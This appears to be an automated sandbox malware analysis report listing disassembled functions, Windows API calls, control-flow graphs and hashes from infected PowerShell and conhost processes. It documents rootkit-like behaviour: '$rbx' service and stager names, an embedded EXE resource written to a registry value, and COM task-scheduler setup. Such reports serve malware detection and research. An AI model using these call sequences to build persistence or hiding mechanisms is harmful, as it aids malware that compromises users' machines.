                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 139 401659 CoUninitialize 136->139 138 401590-4015d5 VariantInit 137->138 137->139 141 4015d7-4015ec 138->141 142 40164d-401656 138->142 139->135 141->142 145 4015ee-401603 141->145 142->139 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                                                                                                                          • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                                                                                                                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401594
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00401609
                                                                                                                                                          • CoUninitialize.COMBASE ref: 00401659
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00401666
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040166B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                                                                          • String ID: $rbx-svc32$$rbx-svc64
                                                                                                                                                          • API String ID: 2407135876-384997928
                                                                                                                                                          • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                                                                                                                          • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                                                                                                                                                          • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                                                                                                                          • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60
                                                                                                                                                          Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128memorycomCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 173 401674-4016a1 SysAllocString * 2 CoInitializeEx 174 401782 173->174 175 4016a7-4016bb CoInitializeSecurity 173->175 176 401785-401797 SysFreeString * 2 174->176 177 4016c8-4016e4 CoCreateInstance 175->177 178 4016bd-4016c2 175->178 179 401777 177->179 180 4016ea-401732 VariantInit 177->180 178->177 178->179 181 40177a-401780 CoUninitialize 179->181 183 401734-40174a 180->183 184 401769 180->184 181->176 185 40176c-401775 183->185 187 40174c-401752 183->187 184->185 185->181 189 401757-401767 187->189 189->185
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                                                                                                                                          • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                                                                                                                          • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004016EE
                                                                                                                                                          • CoUninitialize.COMBASE ref: 0040177A
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040178C
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                          • String ID: $rbx-svc32
                                                                                                                                                          • API String ID: 4184240511-186198907
                                                                                                                                                          • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                                                                                                                          • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                                                                                                                                                          • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                                                                                                                          • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4
                                                                                                                                                          Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36stringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 194 401986-4019b1 lstrlenW call 40104b 197 4019b3-4019bd StrStrIW 194->197 198 4019dd-4019e0 194->198 197->198 199 4019bf 197->199 200 4019c0-4019da StrStrIW 199->200 200->200 201 4019dc 200->201 201->198
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
                                                                                                                                                          • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                                                                                                                                                          • StrStrIW.SHLWAPI(?,Get-Delegate,775C2EB0), ref: 004019D2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: Get-Delegate
                                                                                                                                                          • API String ID: 1659193697-1365458365
                                                                                                                                                          • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                                                                                                                          • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                                                                                                                                                          • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                                                                                                                          • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664
                                                                                                                                                          Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 210 401798-40179e call 4017a5 ExitProcess
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                                                                                                                            • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                                                                                                                            • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                                                                                                                            • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                                                                                                                            • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                                                                                                                            • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040179E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3836967525-0
                                                                                                                                                          • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                                                                                                                          • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                                                                                                                                                          • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                                                                                                                          • Instruction Fuzzy Hash:

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 213 40118e-40119b GetModuleHandleA 214 4011aa-4011ac 213->214 215 40119d-4011a9 GetProcAddress 213->215
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000038.00000002.1927784010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_56_2_400000_powershell.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-1489217083
                                                                                                                                                          • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                                                                                                                          • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                                                                                                                                                          • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                                                                                                                          • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 0000020631822EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: dd3538e39b4fb12fbfda48c50f86fd508ab75b11f440f4316b8f69d08cdebed9
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 6F913772B0175087DB658F25D41CB7DB3A1F748F94F648125AF490B78ADA38D823C758

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000002063182962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: dac8a2433195aa1379ec9c8af6e605e60a2f77d534b37c590229de28146722a0
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: A6D1B032A007908AEB62DF65D48C3AD37E0F745B98F105155EE895BB9BDB34C4A3C784
                                                                                                                                                          Function 0000020631827050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 6e153246571a36c0e1afdb5757265af755f7714f422a47a64caf73a58c104f84
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: C281252460074486FB529B27984E39962F1ABA6F80F5844E5AE094F3D7DB38C877C7CC
                                                                                                                                                          Function 0000020631829EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 6977123dc30e7b09226b3193d7ab43fa9ec949b75f778ce9f2bdaaeb33c88b90
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 6F51BD72600380CAEBB68F21D14C79877E0F755F94F185196DA894BBD6CB38C472CB89
                                                                                                                                                          Function 00000206318280A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: d4f054d591895acf4faeaea6b653f71912bf06063e7d11be3b11a86bf06d0e51
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 8C51AE32311B008AEF55CB15E44CB6C33D1F746F98F258965EE4A4B78ADB78C862C788
                                                                                                                                                          Function 0000020631829AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000003A.00000003.2324750513.0000020631820000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020631820000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_58_3_20631820000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: b55a240086950b917c3aaeaf00115f5fe75272939ebdbdb30f5c4fae2e402c6c
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 4A61C472904BC485EB728F15E44839AB7A0F795B84F044655EF980BB9ACB7CC1A2CB44

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001CCE3642EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 0394bb4b47ccd1dab1aad900d5ac66e5868b1cabfa4a73bf77e7c2c2ab0f4a43
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 1B91E472B4129087EB648F35D500BA9BB99FB55FA8F688124DE4D07798DB34EC62C740

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001CCE364962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 310f30154a6b831172543cc9b5d14f9fc54be49f4af82a2efb80188894200aaf
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: D4D16D32A847808AFB609F75D4447ED7BE8F746BA8F180115EA8D57B96DB34E890C780
                                                                                                                                                          Function 000001CCE3647050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: da7b0356ea41b841a876a27cc630a5bde62a6ca45d60b74262147c20445c98a1
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: AD81C270E802C186FB55AB359841BD92F9DBB87FA0F0C4425E92C4F796DA3AEC4587D0
                                                                                                                                                          Function 000001CCE3649EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 98184752f1fee0012a167cb42287250bd036c2bfd568ad737ed89e9b65ca81e2
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: B4516A32A847C09AFBB48F31D144B987BA8F356FA8F184115DA8D47B95CB39EC50CB81
                                                                                                                                                          Function 000001CCE36480A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 3ed666fcc2d62be28ae2dc06b853063c656d7c2e436bc87a85f73152612311c5
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: DC51C032B51A808AFB54CB35E444FB93B99F346FA8F198521DA4E43788D77AEC41C780
                                                                                                                                                          Function 000001CCE3649AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000045.00000003.2325124553.000001CCE3640000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CCE3640000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_69_3_1cce3640000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: e9e0c21252a6c97f663ad10f9c8c6e7128998fc4ce508525aab44a6f98bd0a88
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: F761A232944BC485E7719F25E440BDABBE4F786BA8F084215EB9C07B99CB7CE590CB40

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 000001858EA12EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 3a3db2866765284e672decd86c76c609f2f3083198cdaeaf91336b1c8496d345
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: CD91487AB0195087EF50AF26D8487BD73A6F746F94F96C0269E4B07788DE34D906D700

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 000001858EA1962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: e40601daf483719f9a7f222e3ecd03bbc0b9ba1efafb41529a14a7cc8b431a12
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: E4D1B432604F4086EB60EF66D8893DD37B6F746B98F908106EE8A67B56DF34C285D701
                                                                                                                                                          Function 000001858EA17050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000046.00000003.2325509229.000001858EA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001858EA10000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_70_3_1858ea10000_conhost.jbxd
                                                                                                                                                          Similarity
